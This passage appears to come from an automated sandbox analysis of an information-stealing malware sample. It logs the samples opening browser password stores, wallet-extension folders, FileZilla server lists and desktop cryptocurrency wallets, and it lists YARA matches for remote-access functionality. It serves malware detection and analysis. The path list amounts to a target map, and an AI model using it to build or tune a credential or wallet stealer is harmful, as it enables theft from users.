Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\KLIZUSIQEN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\21AE.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: Yara match File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0C40 sqlite3_bind_zeroblob, 13_2_6CAD0C40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0D60 sqlite3_bind_parameter_name, 13_2_6CAD0D60
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F8EA0 sqlite3_clear_bindings, 13_2_6C9F8EA0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6CAD0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 13_2_6CAD0B40
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F6410 bind,WSAGetLastError, 13_2_6C9F6410
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F60B0 listen,WSAGetLastError, 13_2_6C9F60B0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FC030 sqlite3_bind_parameter_count, 13_2_6C9FC030
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 13_2_6C9FC050
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F6070 PR_Listen, 13_2_6C9F6070
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9822D0 sqlite3_bind_blob, 13_2_6C9822D0
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9F63C0 PR_Bind, 13_2_6C9F63C0